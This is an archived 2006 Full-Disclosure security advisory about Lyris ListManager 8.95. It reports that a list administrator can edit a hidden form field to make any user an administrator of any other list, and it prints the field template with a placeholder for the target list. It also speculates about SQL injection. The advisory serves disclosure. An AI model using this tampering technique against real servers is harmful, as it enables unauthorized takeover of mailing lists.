[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list

To: info@xxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, designsoftwareproperly@xxxxxxxxx
Subject: [Full-disclosure] Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list
From: Design Properly <designsoftwareproperly@xxxxxxxxx>
Date: Wed, 30 Aug 2006 21:14:27 -0700 (PDT)

Advisory: Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list
Release Date: 2006-08-30
Application: Lyris ListManager 8.95
Risk: Depends upon your use and business context
Vendor site: http://www.lyris.com/

Overview of Product:
    "Lyris ListManager is the world's most popular software for creating, 
sending, and tracking highly effective email campaigns, newsletters, and 
discussion groups." http://www.lyris.com/products/index.html

Details of this Vulnerability:
    A design flaw in ListManager's web-based administrative interface allows 
anyone who is an administrator of a list on the server to add an arbitrary user 
as an administrator to any other list hosted on the same server.  Specifically, 
the form one fills out to add an administrator contains a hidden form field 
with the name of the list to which the administrator will be added.  By 
changing this value and submitting the form (using tools like TamperData for 
FireFox), you can add an arbitrary user as an administrator for an arbitrary 
list.

    Here is a sample of these hidden form fields:

    <!-- START OF - save cgi variables in hidden fields -->
    <input type="hidden" name="MEMBERS_.AppNeeded_" value="F">
    <input type="hidden" name="MEMBERS_.CleanAuto_" value="F">
    <input type="hidden" name="MEMBERS_.DateJoined_" value="2006-08-30 
20:20:32">
    <input type="hidden" name="MEMBERS_.EnableWYSIWYG_" value="T">
    <input type="hidden" name="MEMBERS_.IsListAdm_" value="T">
    <input type="hidden" name="MEMBERS_.List_" value="[INSERT TARGET LIST 
HERE]">
    <input type="hidden" name="MEMBERS_.MailFormat_" value="M">
    <input type="hidden" name="MEMBERS_.MemberType_" value="normal">
    <input type="hidden" name="MEMBERS_.NoRepro_" value="F">
    <input type="hidden" name="MEMBERS_.NotifySubm_" value="T">
    <input type="hidden" name="MEMBERS_.NumAppNeed_" value="0">
    <input type="hidden" name="MEMBERS_.RcvAdmMail_" value="T">
    <input type="hidden" name="MEMBERS_.ReadsHtml_" value="F">
    <input type="hidden" name="MEMBERS_.ReceiveAck_" value="F">
    <input type="hidden" name="MEMBERS_.SubType_" value="mail">
    <input type="hidden" name="current_tab" value="Basics">
    <input type="hidden" name="fields_in_memory" value="FullName_ AppNeeded_ 
PermissionGroupID_ MemberType_ SubType_ Password_ ExpireDate_ SubType_ 
CleanAuto_ NoRepro_ UserID_ Comment_ Additional_ ReceiveAck_ NumAppNeed_ List_ 
DateBounce_ ConfirmDat_ MailFormat_ ReadsHtml_ DateHeld_ DateUnsub_ DateJoined_ 
UserNameLC_ Domain_ EnableWYSIWYG_ EMAILADDR_ IsListAdm_ RcvAdmMail_ 
NotifySubm_">
    <input type="hidden" name="table_in_memory" value="MEMBERS_">

Further Work:
    Yesterday I was trying to add a user whose name contained a single-quote, 
e.g. "O'Conner."  Frequently, as I navigated the web interface, I received SQL 
errors that printed a large portion of the SQL query along with details about 
what failed.  I'm sure there's SQL injection possibilities here as well, I just 
don't have time to explore.  And where there are SQL injection opportunities, 
there's often opportunities for JavaScript injection.

Recommendations to those using ListManager:
    The risk of this issue to your organization is directly tied to how many 
administrators you have on your mailing list server, how much you can really 
trust them, and the value of your mailing lists.  That is, a company that has 
five administrators for a public list shouldn't care.  However, if you've got a 
lot of administrators and a few lists whose discussions would be worth 
intercepting or disrupting, you're at high-risk for abuse as a result of this 
vulnerability.  Until the vendor solves this and other issues, you're going to 
have to have a high level of trust in the people administering your lists, or 
use a different mailing list server.  
    
Best of luck.

                                
---------------------------------
Want to be your own boss? Learn how on  Yahoo! Small Business.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] rPSA-2006-0161-1 libmusicbrainz
Next by Date: [Full-disclosure] [SECURITY] [DSA 1164-1] New sendmail packages fix denial of service
Previous by thread: [Full-disclosure] rPSA-2006-0161-1 libmusicbrainz
Next by thread: [Full-disclosure] [SECURITY] [DSA 1164-1] New sendmail packages fix denial of service
Index(es):
- Date
- Thread